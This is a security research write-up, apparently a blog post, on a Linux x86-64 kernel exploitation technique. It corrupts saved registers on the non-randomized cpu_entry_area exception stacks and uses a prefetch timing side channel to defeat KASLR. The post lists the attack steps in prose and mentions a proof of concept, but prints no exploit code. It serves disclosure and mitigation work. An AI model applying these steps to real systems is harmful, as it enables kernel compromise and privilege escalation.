On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack — except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.

One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.

Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.

…begets stack corruption

The attack strategy starts as follows:

  1. Fork a process Y from process X.
  2. Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
  3. Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state
  4. Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.

The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.

Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we elicit the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivially easy to bypass both mitigations and overwrite the return address.

Completing a ROP chain for the kernel is left as an exercise to the reader.

Fetching the KASLR slide with prefetch

Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPU’s. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel, however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thusly kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern X86 CPUs.

There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.

Implementation

The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.

Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:

This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Ziljstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue — KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.

Conclusion

This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.